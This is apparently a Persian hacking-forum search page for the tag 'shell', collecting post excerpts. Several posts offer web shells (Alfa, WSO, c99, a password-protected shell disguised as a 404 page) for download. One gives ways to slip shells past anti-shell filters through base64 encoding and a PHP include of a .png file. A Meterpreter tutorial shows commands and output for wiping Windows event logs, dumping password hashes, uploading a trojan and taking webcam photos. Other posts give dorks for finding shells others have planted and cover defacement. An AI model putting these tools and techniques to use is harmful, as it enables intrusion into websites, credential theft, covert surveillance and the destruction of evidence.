رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'شل'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.

  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد

جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان

آخرین بروزرسانی

  • شروع

    پایان

فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان

گروه

About Me

29 نتیجه پیدا شد

  1. Zed
    × حفره امنیتی و یا همان باگ چیست ؟ » به نقص ها و سهل انگاری های برنامه نویسان، طراحان وب سایت ها، در کارهای خود به جای میگذارند، نفوذگر آنها را پیدا کرده و از طریق این حفره ها اقدام به نفوذ میکند را باگ می گویند ! × تارگت چیست ؟ » معنی اصلی این کلمه یعنی هدفی که از قبل تعیین شده، به طور مثال نفوذگر پس از جمع آوری کامل اطلاعات از یک وب سایت فهمیده است که این وب سایت حفره امنیتی دارد و میتواند از طریق این حفره ها و باگ ها اقدام به نفوذ کند و آن را هدف و یا تارگت خود قرار میدهد ! × اکسپلویت چیست ؟ » به یکسری کد های مخرب که توسط مهاجم و یا همان نفوذگر نوشته میشود را اکسپلویت می نامند. × پیلود چیست ؟ » به یکسری کد های مخرب وظیفه انتقال پکتهای ارتباطی بین دو کامپیوتر یا چندبن کامپیوتر به صورت غیر مجاز را دارند پیلود میگویند. × کیلاگر چیست ؟ » نرم افرار و یا برنامه ای برای دسترسی به تمامی کلمات و یا حروفی که بر روی صفحه کلید تارگت تایپ میشود را ذخیره و برای نفوذگر ارسال میشود،این کلمات میتوان از انواع آدرس ها مانند حساب های بانکی، پسورد ها و را در نظر گرفت ! × بایپس چیست ؟ » به معنای دور زدن هست یعنی هکر با روش های خاصی موانع امنیتی را دور میزند ! × کلاینت چیست ؟ » سیستم های که از یک سرور خدمات دریافت میکنند را کلاینت های می نامند، برای مثال شما یک کلاینت هستید ! × شل چیست ؟ » در هک هنگامی که هکر با استفاده از ابزارها و کارهای خود میتونه به سیستم قربانی نفوذ کنه و کنترل سیستم رو بدست بگیره اصطلاحا میگن شل گرفته و میتونه تصمیمات خودش رو عملی کنه ! × دیفیس چیست ؟ » وقتی یه هکر سایتی رو هک میکنه ، نمای صفحه اصلی (یا بقیه صفحه های) سایت رو تغییر میده و ممکنه اسم خودش رو هم درج کنه و مسئولیت هک سایت رو بپذیره به این صفحه دیفیس پیج میگویند ! × مس دیفیس چیست ؟ » مس دیفیس هم مثل همون دیفیس هست با این فرق که شما وقتی تمام سایت های متعلق به یک سرور خاص رو دیفیس کنید میگویند مس دیفیس انجام داده اید ! × بک دور چیست ؟ » در هک وقتی یه هکر به سیستمی نفوذ کرد عمدا راه دومی برای نفوذهای بعدی در سیستم هک شده قرار میده تا اگه یوقت احیانا راه نفوذ فعلی شناسایی و بسته شد بتونه با کمک در پشتی که ایجاد کرده دوباره نفوذ کنه ! هماهنگ شده با ادمین عزیز @proxy
  2. amiri82

    آخرین ورژن شل alfa

    amiri82 پاسخی ارسال کرد برای یک موضوع در Shell Script

    سلام دوستان خواستم این شل رو که پر از امکانات مختلف هستش و به شخصه خودم خیلی جاها ازش استفاده کردم رو بزارم اسم شل alfa هستش ورژن 3 (آخرین ورژن) باید استفاده کنید تا به قابلیت های این شل پی ببرید 😧 alfav3-encoded.rar
  3. MR.MSA

    بایپس آنتی شل

    MR.MSA پاسخی ارسال کرد برای یک موضوع در Shell Script

    با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
  4. MR.MSA
    با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL [Hidden Content])" نصب با wget : sh -c "$(wget [Hidden Content] -O -)" نصب با github : [Hidden Content] نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : [Hidden Content] و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
  5. R3DN4X314

    اسکریپت های تمرینی Bash Shell

    R3DN4X314 پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری

    100 نمونه از اسکریپت های نوشته شده با Bash با توجه به اتمام بخش های اول و دوم از اموزش اسکریپت نویسی با شل بش ، و همچنین توانایی خوندن و نوشتن بخش زیادی از انواع اسکریپت ها ، این نمونه هارو براتون قرار دادم تا به عنوان یه بخش تمرینی مورد استفاده قرار بگیره لینک دانلود : [Hidden Content]
  6. R3DN4X314

    اموزش کامل اسکریپت نویسی

    R3DN4X314 پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری

    اموزش کامل اسکریپت نویسی مجموعه اموزشی اسکریپتینگ از سه بخش اصلی تشکیل میشه بخش اول کامند لاین و پیش نیاز های اسکریپت نویسی رو تشکیل میده در بخش دوم اسکریپت نویسی رو از پایه شروع میکنیم و تا سطح متوسط پیش میریم (صفحه دوم) و در بخش سوم مباحت مربوط به اسکریپت نویسی پیشرفته رو دنبال میکنیم لطفا به هیچ عنوان اسپم ندید و اگر امری بود در پیام خصوصی عنوان کنید __________________________________________________________________________________________________________________ بخش اول - قسمت یکم یکی از راه های وصل شدن به CLI یا command line interface یا همان رابط کاربری خط فرمان ، استفاده از لینوکس بدون دسکتاپ هستش درست مثل لینوکس در دوران قدیمش که شما فقط با یک محیط ویژال کنسول سر و کار داشتید برای ویژال کنسول کردن محیط گرافیکی هم میتونیم از Alt + Ctrl + F1 / F7 استفاده کنیم که هر کدوم از اف ها یک محیط ویژال کنسول مجزا برامون فراهم میکنن که مستقیم به ران لول عمیق تر وصل اند و حتی میتونیم همزمان با یوزر های مختلف لاگین کنیم هر کدوم از این محیط های کنسولیه مجزا شماره ی مربوط به خودشون رو دارن که در tty دیده میشه مثلا وقتی شما با Alt + Ctrl +F2 دومین محیط کنسولیه خودتون رو باز میکنید و با همون یوزر یا یوزر دیگه ای لاگین میکنید در اولین خط مقدار tty2 رو میتونید ببینید که نشون میده شما در دومین محیط کنسولیتون قرار دارید برای شیفت کردن بین tty ها از همون Alt + Ctrl + F با شماره ی tty مورد نظر استفاده میشه تو این مورد F1 ( برگشتن از محیط کنسولیه دوم ( با مقدار tty2 ) به محیط کنسولیه اولیه ( با مقدار tty 1 ) ) بعد از شیفت کردن بین کنسول ها ، تمام کنسول ها با هر یوزری که دارن در حالت لاگین میمونن و اعمالی که باهاشون انجام شده هم دست نخورده باقی میمونه که این موضوع انسجام و انعطاف قابل توجهی به وجود میاره ما میتونیم درون محیط های کنسولی هم از text mode console terminal برای کاستومایز کردن محیط کنسول استفاده کنیم با استفاده از دستور setterm برای مثال من چند مورد رو قرار میدم ، که البته خودتون با help میتونید لیست متنوع دستور setterm رو ببینید setterm -background black white red blue green yellow magenta cyan تغیر رنگ پس زمینه به یکی از رنگ هایی که اسمش رو نوشتم setterm -foreground green تغیر رنگ متن به سبز ( یا هر رنگی که اسمش رو بنویسید ) inversescreen on or off برعکس کردن رنگ زمینه و متن store ذخیره ی تغیرات reset برگشت به حالت پیش فرض روش بعدی وصل شدن به شل استفاده از ترمینال های گرافیکی از داخل محیط دسکتاپ هستش این ترمینال ها روی کنسول کار میکنن ولی از داخل محیط گرافیکی دسکتاپ ترمینال های مختلفی در محیط گرافیکی وجوده که هر کدوم اپشن های خودشون رو دارن ، ولی چون کار اصلیه مارو شل ها انجام میدن و این ترمینال ها صرفا رابط هستن ، استفاده از هر کدومشون بیشتر جنبه ی سلیقه ای داره در زیر من لیست پر استفاده هاشون رو با سایت هاشون برای علاقه مندان میزارم Eterm [Hidden Content] Final Term [Hidden Content] GNOME Terminal [Hidden Content] Guake [Hidden Content] Konsole Terminal [Hidden Content] LillyTerm [Hidden Content] LXTerminal [Hidden Content] mrxvt [Hidden Content] ROXTerm [Hidden Content] rxvt [Hidden Content] rxvt-unicode [Hidden Content] Sakura [Hidden Content] st [Hidden Content] Terminator [Hidden Content] Terminology [Hidden Content] tilda [Hidden Content] UXterm [Hidden Content] Wterm [Hidden Content] xterm [Hidden Content] Xfce4 Terminal [Hidden Content] Yakuake [Hidden Content] خوب دوستان این قسمت بیشتر جنبه ی مقدمه ی بخش اول و اشنایی علاقه مندان با کنسول رو داشت به همین دلیل سعی کردم خیلی کوتاه و خلاصه توضیحش بدم ، در قسمت دوم دستورات خط فرمان رو شروع میکنیم
  7. R3DN4X314

    دستورات پر استفاده در meterpreter

    R3DN4X314 پاسخی ارسال کرد برای یک موضوع در متاسپلویت Metasploit

    همونطور که میدونید meterpreter یکی از payload های تعاملی و قدرتمند metasploit هستش که از اهمیت مخصوصی برخورداره اینجا ما با تعدادی از دستورات پرکاربرد و عمومیش با یک توضیح مختصر اشنا میشیم و از خروجی دستورات به عنوان مثال اطلاعات کسب میکنیم : HELP این دستور همونطور که از اسمش مشخصه برای دیدن منوی help در meterpreter استفاده میشه : meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... BACKGROUND این دستور برای ارجاع سیشن فعلی به بک گراند استفاده میشه ، و پس از اون دستورات در msf اجرا میشن برای برگشتن به سیشن کافیه دوباره باهاش تعامل برقرار کنید : meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... CAT مثل بش شل لینوکس محتوای فایلی که به عنوان ارگمان بهش داده بشه رو نمایش میده : meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt guardiran digital security team CD and PWD این دو دستور هم باز مثل بش شل برای تغیر مسیر و نمایش ادرس مسیر فعلی در فایل سیستم استفاده میشه : meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > CLEAREV با استفاده از این دستور در ویندوز لاگ های امنیتی ، سیستمی و اپلیکیشن ها پاکسازی میشن : meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... DOWNLOAD موقع استفاده از دستور دانلود باید نوع سیستم عامل تارگت در نظر گرفته بشه ، به خاطر تفاوت نوع ادرس های فایل سیستم هاشون : meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini EDIT با این دستور میتونیم در هاست تارگت یه فایل برای نوشتن باز کنیم : meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt EXECUTE با استفاده از این دستور میتونیم در هاست تارگت فایل و کامند اجرا کنیم : meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> GETUID با این دستور یوزری که در هاست تارگت شل رو اجرا میکنه نمایش داده میشه : meterpreter > getuid Server username: NT AUTHORITY\SYSTEM HASHDUMP با این دستور محتوای دیتابیس SAM رو میتونیم دامپ کنیم : meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: IDLETIME این دستور ثانیه هایی که یوزر ریموت روی هاست idle شده رو نمایش میده : meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs IPCONFIG این دستور اینترفیس و ادرس های سخت افزاری و نرم افزاری ماشین هدف رو نمایش میده : meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 LPWD and LCD این دستورات جالب همون cd و pwd هستند با این تفاوت که لوکال اجرا میشن ، مثال زیرو ببینید : meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www LS مثل نمونه شل برای لیست کردن فهرست استفاده میشه : meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2019 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2019 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2019 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2019 Application Data ...snip... PS این دستور هم مثل نمونه بش شل برای لیست کردن پروسه ها کاربرد داره : meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... SEARCH همونطور که از اسمش مشخصه برای جستجو استفاده میشه ، مثال : meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) SHELL با استفاده از دستور شل ، یک شل استاندارد از ماشین تارگت دریافت میکنیم : meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> UPLOAD موقع استفاده از این دستور هم مثل دستور دانلود باید نوع سیستم عامل تارگت برای جلوگیری از بروز خطا در نظر گرفته بشه ، با توجه به تفاوت ادرس های فایل سیستم هاشون : meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe WEBCAM_LIST با استفاده از این دستور یه لیست از وبکم های متصل به تارگت دریافت میکنیم : meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) WEBCAM_SNAP در این دستور با انتخاب و مشخص کردن وبکمی که با دستور قبل شناسایی کردیم میتونیم با وبکم موردنظر عکس بندازیم ، که با اپشن h- میتونیم از مزایای مختلفش مطلع بشیم : meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
  8. R3DN4X314

    shell 404

    R3DN4X314 پاسخی ارسال کرد برای یک موضوع در Shell Script

    شل نوستالوژیکه 404 صفحه اول این شل یه اررور پوششیه که صفحه مورد نظر پیدا نشد (برای مخفی سازی) که برای گذشتن از این صفحه پسورد لازمه (وارد کردن پسورد در کادر مخفی) هم پسورد به صورت رمزنگاری شده ، و هم صفحه ارور (با توجه به صفحات تارگت) قابل تعویض هستند دستور دانلود : git clone [Hidden Content] تصویر و مختصر توضیح برای اشنایی بیشتر با شل : [Hidden Content]
  9. DeMoN

    بانک شل

    DeMoN پاسخی ارسال کرد برای یک موضوع در Shell Script

    سلام خدمت دوست عزیز گارد ایران. در این تاپیک قصد دارم بهترین و پرکاربرد ترین شل هارو قرار بدم. امیدوارم لذت ببرین. اولین شل:adminer adminer-3.6.3.rar
  10. mostafaRAT

    Alfa Shell 3.0.2

    mostafaRAT پاسخی ارسال کرد برای یک موضوع در Shell Script

    با سلام جدید ترین نسخه شل آلفا رو میخوام براتون بزارم دو نسخه ENCODE وDECODE شده دریافت فایل alfa3.0.2ENCODE.php دریافت فایل alfa3.0.2DECODE.php
  11. RedNofozi

    چند شل آماده

    RedNofozi پاسخی ارسال کرد برای یک موضوع در Shell Script

    شل.rarبا سلام نزدیک ده تا شل پر کاربرد برای شما اماده کردم ا میدوارم خوشتون بیاد
  12. Host.net
    به نام ایزد منان بدون مقدمه میرم سر اصل مطلب هدف از ایجاد این تاپیک این هست که شما بتوانید به عنوان شخصی حرفه ای کار هاستینگ و سرور انجام بدید و کسب در آمد بالایی داشته باشید. سر فصل ها : 0.1 مقدمه 0.2 وب سرور چیست و چگونه باید آن را ساخت 0.3 چگونه سروری مناسب است 1.0سرور 1.1 سرور رایگان 1.2 علم سرور هکینگ ، گنج است. 1.3 کانفیگ اولیه سرور 1.4 aws=>amazon web survices 1.5 apche Http Server =>windows and linux 1.6 iis for windows 2.7 سرور شخصی خودتان را بسازید 2.8 سرور مجازی شخصی خودتان را بشازید 3.0 هاستینگ 3.1 ساخت localhost در ویندوز و لینوکس 3.2 استفاده از static ip به جای localhost 3.3 تبدیل سرور به هاست دانلود. آموزش ها به صورت متنی و در صورت افاقه نکردن ، ویدیویی همراه با صدا خواهد بود. نظرات فراموشتنون نشه. تا درودی دیگر بدرود.
  13. mownten
    سلام. یه آموزشی تصویری تهیه کردم در خصوص استفاده از باگ افزونه ی Dreamwork gallery توی وردپرس که میشه باهاش فایل مدنظر رو توی سایت آپلود کرد. رمز فایل : guardiran.org موفق باشید 1-Wordpress - arbitrary file upload - GuardIran.part1.rar 1-Wordpress - arbitrary file upload - GuardIran.part3.rar 1-Wordpress - arbitrary file upload - GuardIran.part2.rar
  14. mownten

    گوگل دورک یافتن شل c99

    mownten پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    اینم از لقمه آماده اگر کسی رفته باشه جایی شل c99 آپلود پیدا کرده باشه چطور ما هم اون شل رو پیدا کنیم؟ به دلیل طولانی بودن لیست، توی یه فایل متنی گذاشتمشون. رمز عبور : guardiran.org Shell c99 google dorks - guardiran.org.rar
  15. 1TED

    Guardiran Private Shell

    1TED پاسخی ارسال کرد برای یک موضوع در Shell Script

    سلام ../ یه مدت پیش یه شلی طراحی شده بود که در بخش زیر زمین نگه داری میشد این تصمیمو گرفتم که این شل رو پابلیک کنم تا دوستان هم بتونن استفاده کافی رو ببرن یا حـ ـق ../ پیوستـ شد priv8.php
  16. Mr.Bl4cK
    در این اموزش: دیفیس سایت با اپلود شل رو اموزش میدم تارگت همون dvwa هست که داخل یه هاست اپلود کردم و شما هم میتونین ازش استفاده کنین mr-bl4ck.byethost32.com هر کاری کردین بعدش درستش کنین تو رو خدا اگر هم دیدین کار میکنه بهم بگین تا برم درستش کنم کپچا هم براش گرفتم و الان قسمتش کار میکنه در ضمن قسمت باگ csrf به درستی کار میکنه اما پسورد رو عوض نمیکنه (خودم تغییرش دادم:) اگر خواستین استفاده کنین و یوزر و پس خواست: user: guardiran pass: guardiran امیدوارم از اموزش لذت ببرین Screencast_09-03-2017_05:53:32_AM.mp4
  17. proxy

    اصطلاحات هک

    proxy پاسخی ارسال کرد برای یک موضوع در بحث آزاد

    معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز می‌گویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار می‌شود. علت این اشکالات می‌تواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخه‌هایی تحت نام بتا یا آلفا انتشار می‌دهند تا افرادی آنها را بررسی کنند و این باگ‌ها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
  18. proxy
    سلام ببخشید این بخش سوالات و جوابها رو دوباره رو به راه کنید که ما تو بخش آزاد سوالها رو نپرسیم دوستان کسی اگه چند تا شل asp داره برام قرار بده . خودم چند تا دارم ولی خیلی داغونن و اصلا به درد نمیخورن
  19. BlackErroR
    بسم الله الرحمن الرحیم باسلام در این قسمت شما با شل WSO 2.3 اشنا میشید بصورت کامل. دوستانی هم که کار با این شل رو بلدن خواهشا بزارید تا علممون بره بالا. سوالی داشتین درخدمتم. info_wso_2.3.rar
  20. vahidpour
    سلام دوستان با استفاده از گوگل دورک میتوان به راحتی آپلودرهای مختلف رو مثل fckeditor به وفور پیدا کرد اما مشکل اینه همشون اجازه ارسال شل ویا فرمت ناشناخته نمیدن و فرمتهای خاص مثل txt رو فقط میشه فرستاد. حال برای bypass چه راهکاری پیشنهاد می‌دهید؟ معمولا پیشنهاد میشه، فرمت شل را به عکس تبدیل کرد و بعد با ابزارهایی مثل burpsuite یا live http header در هنگام ارسال فرمت فایل را به php تبدیل کرد اما هر چی اجرا میکنم باز پیام فرمت مجاز نیست میده چون اجازه ارسال فرمتهای ناشناخته نمیدهد از htaccess هم نمیتوان استفاده کرد
  21. 1TED

    Guard Iran Shell

    1TED پاسخی ارسال کرد برای یک موضوع در Shell Script

    سلام دوستان یک شل اسکریپت برای تیم امنیتیمون ریکد کردم ! این مدت به همین دلیل یکمقدار فعالیتم کم شده بود ! امیدوارم ازم بپزیرید این شلو ! ریکد شده از شل داعس هکر رمز شل guardiran صفحه ورودیش 404 هست نحوه ورود : این هم فضای شل یا حـ ـق ../ <--------به زودی با ورژن دوم میترکونیم--------> 1TED.php
  22. Ironknight
    سلام خدمت عزیزان. امروز میخوام بهتون شلر c99 رو آموزش بدم. خوب خیلی از دوستان تازه وارد که قراره از شلر استفاده کنن باید یه تارگت داشته باشن تا بتونن شلر رو امتحان و دستکاری کنند. به قول معروف هر بلایی که میخوان سر شلر بیارن تا یادش بگیرن. خوب به نظر شما چه تارگتی بهتر از سیستم خود ما؟؟؟؟ نه اینترنت لازم داره و نه هزار تا دنگ و فنگ دیگه. تو این آموزش نحوه استفاده از شلر رو در ویندوز آموزش میدم. دوستان همکاری کنند لطفا: نرم افزار مورد نیاز در فیلم رو هم میتونین خیلی راحت با یه جست و جو تو گوگل پیدا کنید. رمز فایل ها: guardiran.org C99.part01.rar C99.part02.rar C99.part03.rar شعار این پست: فدای صفای ایرونی هااا
  23. Goodzilam
